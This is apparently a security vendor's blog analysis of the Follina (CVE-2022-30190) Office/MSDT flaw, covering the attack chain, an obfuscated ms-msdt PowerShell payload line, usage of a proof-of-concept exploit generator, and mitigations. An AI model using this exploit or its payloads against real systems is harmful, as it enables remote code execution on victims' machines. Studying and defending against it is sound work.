Unpacking CVE-2022-30190: An In-Depth Analysis of Follina RCE

Introduction

According to Microsoft's security advisory (CVE-2022-30190), a new vulnerability, "Follina", was identified. The vulnerability uses Microsoft Office to trick users and execute code without their knowledge or consent. Specifically, the vulnerability allows remote code execution when MSDT is called using the URL protocol from an application like Word.

Summary of the Vulnerability

On May 27th, 2022, a security researcher, Kevin Beaumont, published an article about discovering a malicious Microsoft Word document by "Nao_sec." The malware exploited a little-used feature of Microsoft Office to perform malicious actions on a Windows-based system. The attack leveraged a component in Windows called the "Microsoft Support Diagnostic Tool" (MSDT), which the attacker used to download and execute malicious code through a specially crafted Word or RTF file.

Microsoft Security Response Center (MSRC) responded by releasing security updates on June 14th, 2022, to address this vulnerability. It is highly recommended that this update be installed as soon as possible in your organization. MSRC provides more information on this update on their website.

Sophos published a blog post on June 15th titled "Follina gets fixed – but it's not listed in the Patch Tuesday patches!" In this post, Sophos points out that CVE-2022-30190 was not officially listed in Microsoft's June security updates, but the issue was fixed in KB5014697 or KB5014699. For more information, refer to Sophos's blog post.

Which Office versions are vulnerable?

There is a vulnerability that affects Microsoft Office versions 2013, 2016, 2019, and 2021, as well as specific versions of Office that are included with a Microsoft 365 license. This vulnerability exists on both Windows 10 and Windows 11.

How is CVE-2022-30190 (Follina) exploited?

According to the researchers who uncovered it, the following scenario can demonstrate the attack. Malicious actors create a harmful MS Office document and then distribute it to the intended victim. The most common way to achieve this is by sending an email with a harmful attachment and some social engineering tactics to encourage the recipient to open the file. A message such as "Please check the contract urgently, signing tomorrow morning" might persuade the victim to open the file.

The infected file contains a hyperlink to an HTML file with JavaScript code that performs malicious operations in the command line using MSDT. If the attack is successful, the attackers can install programs, view, modify, or delete data, and create new accounts with the victim's system privileges.

We can break down the attack process for this threat into the following steps:

1. The attackers initiate a phishing campaign and email potential victims, luring them to open an MS Office file containing the exploit.

2. Once the user opens the MS Office file, the initial payload is executed through an external resource that is hardcoded in the "document.xml.ref" file.

3. The Follina payload is then transmitted to the victim's system.

4. The code executes additional payloads, such as PowerShell commands and abuses the legitimate Microsoft Support Diagnostic Tool.

Technical Understanding of the Exploit

Extracting all the components that constitute the Office document can be achieved by unzipping the file.

The Follina exploit leverages an external reference that points to a malicious server. The MS Office file analysis reveals that the "document.xml.rels" file contains the OLE Object external reference.

Within the "word/_rels/ folder", there is a "document.xml.rels" file that references an external source at "https[:]//<HOST>/exploit.html"

Content in the "Exploit.html" file

The HTML document used in the Follina exploit begins with a script tag and contains multiple commented A characters, which may serve no purpose as they are just comments. However, according to Huntress' testing, a considerable number of characters are necessary for the exploit to be successful.

location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHcAaQBuAGQAbwB3AHMAXABzAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAnAC8AYwAgAGUAYwBoAG8AIABvAHcAbgBlAGQAIAA+ACAAYwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHcAbgBlAGQALgB0AHgAdAAnAA=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";

This section of the article discusses the crucial part of the exploit, which involves using a schema for "ms-msdt" to invoke the native package PCWDiagnostic with parameters that include PowerShell syntax embedded within $(). The Base64 encoded data is then decoded through two layers of Invoke-Expression to reveal the actual payload.

The encoded Base64 string is:

NOTE: It's important to note that even the preview pane in Windows Explorer can trigger the exploit with just a Rich Text Format (.rtf) file. This means that, like CVE-2021-40444, the severity of the threat extends beyond just a "single-click" attack and could potentially be triggered with a "zero-click" attack.

Working Exploit

A proof-of-concept (POC) script has been created to simulate the 'Follina' Office RCE vulnerability for local testing purposes. The script will generate a payload file named "clickme.docx" (or clickme.rtf) in the current working directory and a web server hosting the exploit.html file in the www directory. The script also allows for customization of the payload and web server parameters, which can be found in the help and examples sections of the script (-h).

Download the POC for the Follina exploit from GitHub and execute the following:

git clone https://github.com/DarkRelay-Security-Labs/CVE-2022-30190-Follina-exploit
cd follina.py
chmod +x ./follina.py
python3 follina.py -h 

The above command(s) should result in an output that looks something like this:

-m {binary,command}, --mode {binary,command}
                        Execution mode can be "binary" to load a (remote) binary, or "command" to run an encoded PS command
-b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share
-c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode
-t {docx,rtf}, --type {docx,rtf}
                        The type of payload to use can be "docx" or "rtf"
  -u URL, --url URL    The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables
                        webserver if a custom URL scheme or path is specified
  -H HOST, --host HOST  The interface for the webserver to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server, defaults to 80

Example Commands:

python .\follina.py -t docx -m binary -b \windows\system32\calc.exe

python .\follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe

python .\follina.py -t docx -m binary -b \\localhost\c$\windows\system32\calc.exe

python .\follina.py -t rtf -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned >   c:\users\public\owned.txt'"

python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 1.2.3.4

python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

We have successfully prepared the exploit "clickme.docx", and sent this to the victim.

Once he/she clicks on it, "calc.exe" will execute.

Mitigation

At the moment, a patch for the exploit is available. Microsoft Office has released patches for the Follina vulnerability CVE-2022-30190 (Follina) with the June 14, 2022, Windows Security Update.01 Appropriate vulnerability tests have been implemented in the Greenbone Enterprise Feed and the Greenbone Community Feed, allowing you to test your network for vulnerability and take protective measures using these patches. You can take measures to limit your attack surface and reduce the risk of being affected. One way to do this is by activating Microsoft Defender's Attack Surface Reduction (ASR) rule "Block all Office applications from creating child processes" in Block mode. This prevents the exploit from being used. If you haven't used ASR before, try running the rule in Audit mode first to ensure it doesn't negatively impact end users.

Another option is to remove the file type association for ms-msdt, which can be done either in the Windows Registry "HKCR:\ms-msdt" or with Kelvin Tegelaar's PowerShell snippet. By doing this, when the malicious document is opened, Office won't be able to invoke ms-msdt, effectively preventing the malware from running. Before using this mitigation, it's essential to back up the registry settings.

References:

• https://github.com/onecloudemoji/CVE-2022-30190

• https://www.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks

Register for instructor-led online courses today!

https://www.darkrelay.com/courses

Check out our free programs!

https://www.darkrelay.com/programs

Reach out to us with your custom pen testing needs at: info@darkrelay.com

WhatsApp us

Follow us on Twitter Facebook Instagram YouTube Pinterest.